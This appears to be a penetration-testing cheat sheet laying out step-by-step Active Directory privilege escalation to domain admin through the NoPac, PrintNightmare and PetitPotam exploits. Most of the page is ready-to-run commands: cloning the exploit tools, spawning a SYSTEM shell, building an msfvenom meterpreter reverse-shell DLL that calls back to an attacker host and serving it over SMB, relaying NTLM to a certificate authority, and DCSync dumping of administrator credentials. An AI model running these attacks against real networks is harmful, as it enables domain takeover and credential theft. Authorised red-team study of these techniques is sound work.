View on GitHub

Privilege Escalation to Domain Admin using Known Exploits

NoPac

  • NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access

  • This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.

  • The flow of the attack is outlined here: SecureWorks Blog

Exploiting NoPac:

  1. Get the NoPac exploit: git clone https://github.com/Ridter/noPac.git

  2. Check if target is vulnerable: sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap

  3. Get a SYSTEM shell as the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap

  4. Perform DCSync against the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator

PrintNightmare

  • Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.

Exploiting PrintNightmare:

  1. Get the exploit: git clone https://github.com/cube0x0/CVE-2021-1675.git

  2. Install cube0x0's version of impacket:

    pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

  3. Check if the Windows target has MS-PAR & MSRPRN exposed: rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

  4. Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll

  5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download: sudo smbserver.py -smb2support Data /path/to/backupscript.dll

  6. Run the exploit: sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'

PetitPotam

  • PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445

  • This attack allows an unauthenticated user to take over the domain

  • More information about PetitPotam can be found here: DirkJanm Post

Exploiting PetitPotam:

  1. Start an NTLM relay: sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController Note: you can use certi to find the location of the CA

  2. Get Petit Potam: git clone https://github.com/topotam/PetitPotam.git

  3. Run Petit Potam. `python3 PetitPotam.py attacker-ip dc-ip

  4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell

  5. Request a TGT for the domain controller using the certificate: python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache

  6. Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache

  7. Perform DCSync using (-k) the previous ccache file : secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME

Last updated